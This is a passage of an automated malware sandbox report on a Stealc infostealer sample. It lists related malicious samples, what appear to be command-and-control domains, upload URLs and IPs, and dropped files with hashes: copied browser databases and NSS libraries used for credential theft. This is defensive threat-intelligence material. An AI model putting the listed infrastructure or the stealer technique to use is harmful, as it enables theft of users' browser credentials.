	Setup.exe	Get hash	malicious	Cryptbot	Browse	levxc11vt.top/v1/upload.php
	Setup.exe	Get hash	malicious	Cryptbot	Browse	levxc11vt.top/v1/upload.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	fivexc5pn.top/v1/upload.php
	file.exe	Get hash	malicious	Amadey, Cryptbot, Go Injector, PureLog Stealer, RedLine, Stealc, Vidar	Browse	fivexc5pn.top/v1/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
yosoborno.com	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	160.178.90.95
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.57.36.33
	88b5ed74d4fc6f2cf6394bd1766f44df61e7dc9b810cfacbecba5b34af3bf57d_dump.exe	Get hash	malicious	SmokeLoader	Browse	181.128.22.240
	3S8tURSatT.exe	Get hash	malicious	SmokeLoader	Browse	186.101.193.110
	FmtTgxPmfW.exe	Get hash	malicious	SmokeLoader	Browse	109.98.58.98
	eA8RqncXek.exe	Get hash	malicious	SmokeLoader	Browse	109.98.58.98
	CbLDghhFAW.exe	Get hash	malicious	SmokeLoader	Browse	109.98.58.98
	vwAGeX1bR4.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	89.135.141.31
	uV7ttrc7wN.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	211.181.24.132
	064c59b3a8b03e6c733f88483fd675d99bc805399c55d4a1a7b613aa20d08de8_dump.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	190.147.2.86
jirafasaltas.fun	SecuriteInfo.com.Win64.DropperX-gen.21682.4890.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Win64.CrypterX-gen.4166.17445.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Win64.DropperX-gen.4383.5748.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win64.CrypterX-gen.4166.17445.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win64.MalwareX-gen.19968.21519.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Win64.MalwareX-gen.19968.21519.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	188.114.97.3
	TT ViewBot v3.7.zip	Get hash	malicious	Clipboard Hijacker	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	PO#4510065525.exe	Get hash	malicious	FormBook	Browse	104.207.148.137
	Quote 1T PN40 082624.exe	Get hash	malicious	FormBook	Browse	155.138.157.207
	file.exe	Get hash	malicious	Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	95.179.163.21
	3TDGE1FVVn.exe	Get hash	malicious	AsyncRAT	Browse	80.240.28.67
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	95.179.163.21
	file.exe	Get hash	malicious	RedLine	Browse	95.179.163.21
	http://apotekspeakeasy.com	Get hash	malicious	Unknown	Browse	45.77.78.73
	tKr6T60C1r.exe	Get hash	malicious	Unknown	Browse	45.32.1.23
	surp.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, Vidar	Browse	95.179.163.21
	sora.spc.elf	Get hash	malicious	Unknown	Browse	78.141.232.187
CP-ASDE	PO#4510065525.exe	Get hash	malicious	FormBook	Browse	65.21.196.90
	file.exe	Get hash	malicious	Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	65.21.18.51
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	65.21.18.51
	file.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	65.21.18.51
	http://solarrebater.org/	Get hash	malicious	Unknown	Browse	65.21.209.123
	surp.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, Stealc, Vidar	Browse	65.21.18.51
	Debit note Jan-Jul 2024.exe	Get hash	malicious	FormBook	Browse	65.21.196.90
	PURCHASE ORDER_330011 SEPTEMBER 2024.exe	Get hash	malicious	FormBook	Browse	65.21.196.90
	RFQ-230802024.PDF.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	65.21.196.90
	http://wise.com.stands.solidpoint.net/	Get hash	malicious	Unknown	Browse	65.21.58.204
DCI-ASIR	43q1wNs9CA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	93.118.137.82
	4G6yVLS3wA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	46.100.50.5
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	93.118.137.82
	0S2jhDIWWK.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	93.118.137.82
	154.216.18.223-x86-2024-08-17T03_44_00.elf	Get hash	malicious	Mirai	Browse	2.191.107.183
	hoho.arm7.elf	Get hash	malicious	Mirai	Browse	2.188.125.211
	SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	2.176.99.59
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	5.74.120.80
	77.90.35.9-skid.x86_64-2024-07-30T07_10_51.elf	Get hash	malicious	Mirai, Moobot	Browse	2.190.205.18
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	2.190.45.130
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	ORDER PO 40192005315.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	154.216.20.37
	SecuriteInfo.com.NSIS.Runner.AV.tr.19719.14302.exe	Get hash	malicious	Unknown	Browse	154.216.20.190
	file.exe	Get hash	malicious	Python Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	154.216.18.223
	SecuriteInfo.com.Win32.MalwareX-gen.20431.17656.exe	Get hash	malicious	XWorm	Browse	154.216.18.213
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse	154.216.18.223
	SecuriteInfo.com.Win32.PWSX-gen.17334.14366.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	154.216.20.211
	jasht.arm5.elf	Get hash	malicious	Gafgyt, Mirai	Browse	154.216.18.202
	jasht.arm4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	154.216.18.202
	jasht.mpsl.elf	Get hash	malicious	Gafgyt, Mirai	Browse	154.216.18.202
	jasht.mips.elf	Get hash	malicious	Gafgyt, Mirai	Browse	154.216.18.202

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	6rfHnQpz6K.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	6rfHnQpz6K.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CAAAFCAK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAKFCGIJKJKFHIDHIIIE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGHCAKKE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHIDAKFIJJKJJJKEBKJE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJEBGHIEBFIJKECBKFHDHDAKKJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJJECBKKECFIEBGCAKJKECGCFI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJEHCGIJECFIECBFIDGDAKFHIE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEBKKEGDBFIIEBFHIEHC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9370
Entropy (8bit):	5.514140640374404
Encrypted:	false
SSDEEP:	192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
MD5:	7E44458E0A8A3A7D10875BC3B7AE72D1
SHA1:	E5E6AC8676EE3761DAB13A10EB7573C19F48D297
SHA-256:	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
SHA-512:	012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\KFCFBFHIEBKJKFHIEBFBAEGHJD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 6rfHnQpz6K.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 6rfHnQpz6K.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user~1\AppData\Local\Temp\Continues.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (779), with CRLF line terminators
Category:	dropped
Size (bytes):	14996
Entropy (8bit):	5.067627639870129
Encrypted:	false
SSDEEP:	384:eVBYHob1k4dljIDMob5chIukwWXVU9/b16+atFkjPom:eR1k4HjIJa1OVa/b16+atAPom
MD5:	2226738A67DA04CEF580C99F70B9A514
SHA1:	48BBFBFDCE94231EBC1833B87FF6E79AA716E3B4
SHA-256:	E04A1B86CE1A5352F7C3A5DDB8B500993F4342EF4E188ED156009E5271795AF1
SHA-512:	C653AAFD3AA2D320EEF1D5B9CF9E58372E778C41147C3D85BCB6E231C8703D19F410EBB2F58F2A9F0671F027FCE2BAEEEC70252E926BB9880128BA6DCEDFDB08
Malicious:	false
